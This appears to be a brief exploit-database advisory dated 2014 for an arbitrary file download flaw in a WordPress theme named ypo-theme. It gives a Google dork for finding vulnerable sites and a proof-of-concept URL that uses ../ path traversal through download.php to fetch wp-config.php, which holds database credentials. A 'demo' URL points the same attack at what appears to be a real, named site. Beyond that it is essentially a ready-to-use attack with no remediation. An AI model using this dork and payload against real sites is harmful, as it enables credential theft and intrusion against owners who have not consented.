facebook facebook twitter rss

Wordpress ypo-theme Theme Arbitrary File Download Vulnerability

Author: Felipe M , Published: 26-09-2014
# Exploit Title: Wordpress ypo-theme Theme Arbitrary File Download Vulnerability

# Google Dork: inurl:/wp-content/themes/ypo-theme

# Date: 25-09-2014

# Author: Felipe M.

# Author E-mail : secure@gudwal.com

# Category:: webapps

# platform : php

# p0c :

http://[site]/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php

# demo :

http://www.ifso.com/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.php

Like us on Facebook :